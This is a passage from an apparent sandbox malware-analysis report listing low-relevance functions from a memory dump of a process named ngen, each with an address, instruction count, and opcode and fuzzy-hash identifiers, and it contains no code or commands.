                                                                                                                      • Opcode ID: 4f3f3c40c7bea2373d661699e436419013aa452a693087c4de52d5661d2ea784
                                                                                                                      • Instruction ID: e6a98847d7c5a861d5faefd67ffa7c9cd37ac240136cd76286560f823fdce706
                                                                                                                      • Opcode Fuzzy Hash: 4f3f3c40c7bea2373d661699e436419013aa452a693087c4de52d5661d2ea784
                                                                                                                      • Instruction Fuzzy Hash: E4F0277A53A7C047CF319B28749D6A92F65A746010F195449DEA26B302DD749883E720
                                                                                                                      Function 0576C5ED Relevance: .0, Instructions: 31COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 31ce2e7e0cbe4050e9584cba320ff8ad0aeb4330aaaf104134d2350815ab273a
                                                                                                                      • Instruction ID: 32339518df5460517f4c053f7fce568887630e566b273817f654be278b2ade5a
                                                                                                                      • Opcode Fuzzy Hash: 31ce2e7e0cbe4050e9584cba320ff8ad0aeb4330aaaf104134d2350815ab273a
                                                                                                                      • Instruction Fuzzy Hash: A3F0EC71619A909FC723DF18C548F21B3EDBB017A0F08A826DC8AC7952C364CC80EA99
                                                                                                                      Function 05772619 Relevance: .0, Instructions: 31COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                      • Instruction ID: b756e0debe01b203902257bd0dfb8494ea2bd47286e39940ce3e9c0d99e67c4c
                                                                                                                      • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                      • Instruction Fuzzy Hash: 5CE0D8723016002BDB219E599CC8F47776EEFC2B10F04007AB5049F252CAE2DC0996A8
                                                                                                                      Function 0580539D Relevance: .0, Instructions: 31COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b9015beb9f659fff430660892c92c81aba153c3847cf8026ef83c71db71425e4
                                                                                                                      • Instruction ID: 15875ca8f331ac698ee7f1cd6d94df7d8c74d279fc676af7898b0c5c2fc8e17c
                                                                                                                      • Opcode Fuzzy Hash: b9015beb9f659fff430660892c92c81aba153c3847cf8026ef83c71db71425e4
                                                                                                                      • Instruction Fuzzy Hash: 10F05470A1024CAFDB04EB79E549E6DB7B5EF04304F108455E905EB281DA74DD01DB25
                                                                                                                      Function 058054DB Relevance: .0, Instructions: 30COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 673d3bee09c0379afb7b30e8464763205f6b2f20d2203251daf61830b102c68d
                                                                                                                      • Instruction ID: 92b173ed334d4ce7a8c582a211f5aa760fab1940e4a30926875c947d03135433
                                                                                                                      • Opcode Fuzzy Hash: 673d3bee09c0379afb7b30e8464763205f6b2f20d2203251daf61830b102c68d
                                                                                                                      • Instruction Fuzzy Hash: A4F08270A1024CAFDF04EBA9E95AE9E7BB5EF08304F100458A901EB2C0EA34DD00DB29
                                                                                                                      Function 0580547F Relevance: .0, Instructions: 30COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 05eb3b5abaa815828b3f00a6b23c01ddfd655a6d2250653a56fecabc6ed7f799
                                                                                                                      • Instruction ID: 1778829c540294896ed751c9fa1dc65fa03d1107d82987cfed528702eaaf6a7e
                                                                                                                      • Opcode Fuzzy Hash: 05eb3b5abaa815828b3f00a6b23c01ddfd655a6d2250653a56fecabc6ed7f799
                                                                                                                      • Instruction Fuzzy Hash: AAF08270B1164CABDF04DBA9E94AE9E7BB4EF08304F100454E901EB3C0EA34DD00DB65
                                                                                                                      Function 057EF72E Relevance: .0, Instructions: 30COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e24e5ae09814cf7cb2b37367dfb957c59a4f87c7f70b2ac0f668a3b84b90759a
                                                                                                                      • Instruction ID: 6282e7db14d8d4b76db799f7dd32b5734df3128bce33c211724e01e86245999c
                                                                                                                      • Opcode Fuzzy Hash: e24e5ae09814cf7cb2b37367dfb957c59a4f87c7f70b2ac0f668a3b84b90759a
                                                                                                                      • Instruction Fuzzy Hash: 03F08271A11348AFDF04DBA9D55EE9E7BB4EF08704F400054E502EB280D974D901A715
                                                                                                                      Function 058051CB Relevance: .0, Instructions: 30COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 52f09e7fbd6d6e35a151870605c57ae1556d40198111bcdff3d18a93611f11e3
                                                                                                                      • Instruction ID: e9b1a783c68b4d08e2c72479cd8361b5c3f31cf3ff1c1da3b61f10fd57dbb80a
                                                                                                                      • Opcode Fuzzy Hash: 52f09e7fbd6d6e35a151870605c57ae1556d40198111bcdff3d18a93611f11e3
                                                                                                                      • Instruction Fuzzy Hash: A1F05E70A1124CABDF04EBA8E90AE6E77A4AF04208F040459A901EB2C1EA74E900DB65
                                                                                                                      Function 057AD070 Relevance: .0, Instructions: 30COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                      • Instruction ID: dde79eb799674078ba7631614ef007ec4878a79436a3c5a6e13af3cf2ce8ec0c
                                                                                                                      • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                                                      • Instruction Fuzzy Hash: 34F0E53360461467C231AA098C09F5BFBACDBD5B70F20471ABA249B1E0DA70A901E7D6
                                                                                                                      Function 057655C0 Relevance: .0, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                      • Instruction ID: 02178e61deddae81ebbc3f5dc0a08772feed82ff61d89bdf913993720a7586b0
                                                                                                                      • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                                                      • Instruction Fuzzy Hash: 1CE0E533104614ABC6215A07EC0CF12BB6AFF907B0F104615A56917591C760A811FAD8
                                                                                                                      Function 05730710 Relevance: .0, Instructions: 28COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                      • Instruction ID: ca96f82f4593c20987d984bdd4f06d6f40b5270f840f58498d9e207fa39c8895
                                                                                                                      • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                      • Instruction Fuzzy Hash: 6BF0ED3A3087509FDB16DF15C048EA97FA9FB45360B040494EC468B302EB32E982EF80
                                                                                                                      Function 058037B6 Relevance: .0, Instructions: 27COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                      • Instruction ID: 8c22fe3df5e5499c2354dd75857174dc4845f3e7718ae07f28a4daef30df2b73
                                                                                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                                                      • Instruction Fuzzy Hash: A2E06D72210204AFE764EB58DD09FA673ACFB00720F140668B526D30D0DBB0AE40CA60
                                                                                                                      Function 057325E0 Relevance: .0, Instructions: 23COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2994545307-0
                                                                                                                      • Opcode ID: 136ae5e0b51818691f206278da1dc7abac0a5ca149fc86438a7226dbef7b6bfe
                                                                                                                      • Instruction ID: 3d2968632142bfa1c00f48a693fe10dba424edcaaf4c3adb80ced42f1c621652
                                                                                                                      • Opcode Fuzzy Hash: 136ae5e0b51818691f206278da1dc7abac0a5ca149fc86438a7226dbef7b6bfe
                                                                                                                      • Instruction Fuzzy Hash: 82E092322006549BC721BF29DD0EF8A7B9AEF50374F114525B125575A1CB30A850D788
                                                                                                                      Function 05732050 Relevance: .0, Instructions: 20COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e412e6e59b3482d8696f8869c8e3a61d96b05193f6b0109f1c592e498f629223
                                                                                                                      • Instruction ID: 8207177fc7d1cfc94f858b2109fa62eb38195254c121750c3e3fab278e1fd891
                                                                                                                      • Opcode Fuzzy Hash: e412e6e59b3482d8696f8869c8e3a61d96b05193f6b0109f1c592e498f629223
                                                                                                                      • Instruction Fuzzy Hash: 29E08C32200554ABC721FA5DDD0AF4A779AEF94270F104121B15487691CB20AC40D794
                                                                                                                      Function 0572B562 Relevance: .0, Instructions: 17COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                      • Instruction ID: 7bcd0e46addd0a8feb5fae41de032897bd3d55eb243e1a8dbe266d2922a07de8
                                                                                                                      • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                                                      • Instruction Fuzzy Hash: 0DD05B31261660AFC7327F17ED0DF427B75AF80B10F15051970451A4F0C661DD84E690
                                                                                                                      Function 0576E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                      • Instruction ID: 308bbb033d065971ca253891edb1826370a75dba40100fa8268bba7131901219
                                                                                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                      • Instruction Fuzzy Hash: 29D0A933204620ABD732AA1CFC08FD333E9BB88720F160859B019C7090C360AC81DA84
                                                                                                                      Function 0572A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction ID: 4b71e1bcb848e7e3b17d664b12838609dd9db885c92a74cf6c9bce17d6b4d8e4
                                                                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                      • Instruction Fuzzy Hash: 52D0123232607197CB29A6556958F676A16EB81AA4F2A046D780AD3940C5158C82E6E0
                                                                                                                      Function 0576C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction ID: c186daa0e70dfb4de031ef03e8f8ef4568872d1bff3d62364d7b709ea4ddbe78
                                                                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                      • Instruction Fuzzy Hash: 9BC08C33290648AFC712EF98CD05F027BA9EB98B40F100821F3088B6B0C631FC60EA84
                                                                                                                      Function 0575340D Relevance: .0, Instructions: 10COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                      • Instruction ID: 9353b5696cf69d8da0380ef706ae91e6a2e27f30251737f558c3e3ca83c0fc10
                                                                                                                      • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                                                      • Instruction Fuzzy Hash: 8BC08C702415806AEB2B6B00C908F3C3650BB006A6F940D9CBE45294F1C3BA9802A618
                                                                                                                      Function 05730750 Relevance: .0, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction ID: 0548d6b3348374bedfcf9320e6aeae06b1b71c3b88626217ca4e314f326ef681
                                                                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                      • Instruction Fuzzy Hash: 84C04879B41A418FCF15EB2AD298F6977E8FB44740F150890E809CBB21E724E841EE10
                                                                                                                      Function 05774650 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c0631a1f2e62634f56c377b16171d4fd114f3a96c9001c16332f339f62ce7641
                                                                                                                      • Instruction ID: aba0d148d07816651e57265a5f27b1bc1df7e9af8d762646a4dd6cfa9a0b3084
                                                                                                                      • Opcode Fuzzy Hash: c0631a1f2e62634f56c377b16171d4fd114f3a96c9001c16332f339f62ce7641
                                                                                                                      • Instruction Fuzzy Hash: 0B90026264150042414071584884416601697F13113D5C565A0554574C86188955A26B
                                                                                                                      Function 05773010 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 408aef08eb88870a7ab62151eaa6c93ece05ce6d02a4717dbd7ca366f089d8ce
                                                                                                                      • Instruction ID: 17403a5568b80c6d407b8253efc86a766187493bf90890d6f51b15e432fd8e4f
                                                                                                                      • Opcode Fuzzy Hash: 408aef08eb88870a7ab62151eaa6c93ece05ce6d02a4717dbd7ca366f089d8ce
                                                                                                                      • Instruction Fuzzy Hash: D490022224184442D14072584884B1F411687F1312FD5C469A4156568CC91589556723
                                                                                                                      Function 05773090 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 2b797cd24c8fcdb875894b6871b32d3587b03c7dfb3eaf11bb93ff2f6625fca3
                                                                                                                      • Instruction ID: c4f99376cbe1e3cbe4f9141ea62fb5a9aff084dd81ba507597e4c83c8a32db33
                                                                                                                      • Opcode Fuzzy Hash: 2b797cd24c8fcdb875894b6871b32d3587b03c7dfb3eaf11bb93ff2f6625fca3
                                                                                                                      • Instruction Fuzzy Hash: E890022228140802D140715884947170017C7E0711FD5C461A0024568D86168A6576B3
                                                                                                                      Function 05774340 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 625d8926aece0b73f8d09f2946d6077d820cf1bcffb55807b46a35fdf9fa07b8
                                                                                                                      • Instruction ID: 79a6eb16bf23dce2eb90bbcd1dbd33f32bca1c00d22ee4567a97b5521fe0a389
                                                                                                                      • Opcode Fuzzy Hash: 625d8926aece0b73f8d09f2946d6077d820cf1bcffb55807b46a35fdf9fa07b8
                                                                                                                      • Instruction Fuzzy Hash: 14900232645800129140715848C4556401697F0311BD5C461E0424568C8A148A566363
                                                                                                                      Function 05773D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: b7e7bf9767439f63da63bd888fa6390eaf05d587714f7cca52db64c99fdc533b
                                                                                                                      • Instruction ID: 23595ffa1c594850624800bd26eb7983d74c33e4bc6012dd1b382c5340602eb9
                                                                                                                      • Opcode Fuzzy Hash: b7e7bf9767439f63da63bd888fa6390eaf05d587714f7cca52db64c99fdc533b
                                                                                                                      • Instruction Fuzzy Hash: DD90023624140402D51071585884656005787E0311FD5D861A042456CD865489A1B123
                                                                                                                      Function 05772D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8c644df487fae4ba97bb083ba1931577bb9af6db3c1b583138d5d818309dbf9e
                                                                                                                      • Instruction ID: 9c2d403d680abdd5a57ee8a1fb9cc28451751d7e8926f2f672a84390d04f60a8
                                                                                                                      • Opcode Fuzzy Hash: 8c644df487fae4ba97bb083ba1931577bb9af6db3c1b583138d5d818309dbf9e
                                                                                                                      • Instruction Fuzzy Hash: C790022234140003D140715854986164016D7F1311FD5D461E0414568CD91589566223
                                                                                                                      Function 05772D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 7d41e7ed31b3f3145be29fb1ff382d67aef4cc819de20275b3c89e990c07b650
                                                                                                                      • Instruction ID: c951ae80343cbc1da4374954f8c552f6a58dcfa43cbd3d060c3d8ea1ab5d51b7
                                                                                                                      • Opcode Fuzzy Hash: 7d41e7ed31b3f3145be29fb1ff382d67aef4cc819de20275b3c89e990c07b650
                                                                                                                      • Instruction Fuzzy Hash: C990022A25340002D1807158548861A001687E1312FD5D865A001556CCC91589696323
                                                                                                                      Function 05773D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 977bf81eb4807f6e822a85e661fed3b539a289ed8a663b577a7f9190c88df88f
                                                                                                                      • Instruction ID: b4808a04645dc5d3692ac3f5b9d72da8444bca50aa39fbc9ca95a12f8fb20349
                                                                                                                      • Opcode Fuzzy Hash: 977bf81eb4807f6e822a85e661fed3b539a289ed8a663b577a7f9190c88df88f
                                                                                                                      • Instruction Fuzzy Hash: 5690023224240142954072585884A5E411687F1312BD5D865A0015568CC91489616223
                                                                                                                      Function 05772D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e65cf1adffc6d2cf665aa7bfe8da08bd060aaeb86d75012c5aa9791b55dbad4b
                                                                                                                      • Instruction ID: 1994c2283f709b1068e74c442fd3202aeb8de97206ed9cbebe247f111847e0dd
                                                                                                                      • Opcode Fuzzy Hash: e65cf1adffc6d2cf665aa7bfe8da08bd060aaeb86d75012c5aa9791b55dbad4b
                                                                                                                      • Instruction Fuzzy Hash: 6990022224544442D10075585488A16001687E0315FD5D461A10645A9DC6358951B133
                                                                                                                      Function 05772DD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, Offset: 05700000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_5700000_ngen.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: e4b2e2f1b46d62c3c494acef50193a2f208128c5fd19e3f7b7b141f96eab7ff3
